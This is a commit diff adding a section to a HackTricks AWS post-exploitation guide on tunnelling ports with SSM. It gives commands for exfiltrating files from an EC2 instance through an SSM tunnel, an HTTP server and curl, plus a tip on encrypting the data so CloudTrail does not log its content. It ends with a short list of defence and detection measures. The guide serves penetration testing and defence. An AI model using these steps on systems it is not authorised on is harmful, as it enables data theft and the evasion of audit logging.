Add content from: How to transfer files in AWS using SSM

HackTricks News Bot · HackTricks News Bot · commit a55832e370d9 · 2025-08-06T01:38:30.000Z
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
@@ -138,6 +138,63 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls-
 
 Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
 
+---
+
+#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)
+
+If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required):
+
+```bash
+aws ssm start-session --target i-0123456789abcdef0 \
+  --document-name AWS-StartPortForwardingSession \
+  --parameters "portNumber"="8000","localPortNumber"="8000" \
+  --region <REGION>
+```
+
+The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.
+
+Common use cases:
+
+* **File exfiltration**
+  1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate:
+
+     ```bash
+     python3 -m http.server 8000
+     ```
+
+  2. From your workstation fetch the files through the SSM tunnel:
+
+     ```bash
+     curl http://localhost:8000/loot.txt -o loot.txt
+     ```
+
+* **Accessing internal web applications (e.g. Nessus)**
+
+```bash
+# Forward remote Nessus port 8834 to local 8835
+aws ssm start-session --target i-0123456789abcdef0 \
+  --document-name AWS-StartPortForwardingSession \
+  --parameters "portNumber"="8834","localPortNumber"="8835"
+# Browse to http://localhost:8835
+```
+
+Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content:
+
+```bash
+# On the instance
+7z a evidence.7z /path/to/files/* -p'Str0ngPass!'
+```
+
+---
+
+**Defence & Detection**
+
+* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents.
+* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document.
+* Use VPC endpoints plus traffic inspection to detect unexpected data egress.
+
+
+
 ### Share AMI
 
 ```bash
@@ -474,6 +531,10 @@ if __name__ == "__main__":
     main()
 ```
 
+## References
+
+- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)
+
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
